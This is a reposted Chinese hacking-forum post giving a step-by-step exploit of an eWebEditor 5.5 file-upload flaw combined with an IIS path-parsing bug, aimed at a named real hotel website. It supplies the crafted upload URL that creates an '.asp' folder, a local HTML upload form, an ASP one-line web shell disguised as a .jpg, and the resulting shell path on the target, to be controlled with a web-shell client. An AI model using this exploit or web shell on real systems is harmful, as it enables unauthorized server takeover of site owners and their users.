ewebeditor 5.5漏洞利用【转载】
目标站:http://www.sz-hotel.com/网站的注入、猜帐号密码、找后台、这些不是本文重点就此略过。
此网站的ewebeditor 是5.5的
在百度搜索ewebeditor 5.5的漏洞就能找到相关的漏洞详情。
先访问这个地址:
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=weibao.asp
访问这个地址可以建立个weibao.ASP的文件夹……
再用这个html代码上传。
<form action="地址/path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%">
<input type=submit value="上传了"></input>
</form>本地提交了一个图片小马,返回空白页面,查看源码,得到小马路径。还是IIS解析漏洞~
对6.X的也管用,对ASP。aspx。JSP。均管用。
在此之前我先确定了ewebeditor 5.5所在的地址:
http://www.sz-hotel.com/admin/myeWebEditor/
PS:转入地址将会列目录。
得到漏洞地址为:http://www.sz-hotel.com/admin/myeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=jc.asp访问这个地址可以建立个jc.asp的文件夹
在uploadfile文件目录下。因为上传的图片就在此文件下。
这样我们可以利用解析漏洞对文件夹上传图片。
在本地构架一个上传页面,代码是:
<form action="地址/path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%">
<input type=submit value="上传了"></input>
</form>
将这一段代码换成我们的漏洞地址:
/path/upload.asp?action=save&type=&style=样式名
换成:http://www.sz-hotel.com/admin/myeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=jc.asp好,把文件的后缀变成htm,后打开。
上传图片网马小马大马都可以,但是上传大马因为他有一个保护措施,所以我这里就不上传大马了,上传一句话。
随便找一句话:<%eval request("pass")%>新建立一个文档,输入此一句话,然后保存为jpg后缀。
上传之后就变成空白了,然后右键查看源代码。
此地址就是网马的所在地址:http://www.sz-hotel.com/uploadfile/jc.asp/201307/20130726215332219.jpg菜刀链接
作者:Syonkforum f4ck 看起来和xycms的一个漏洞差不多
页:
[1]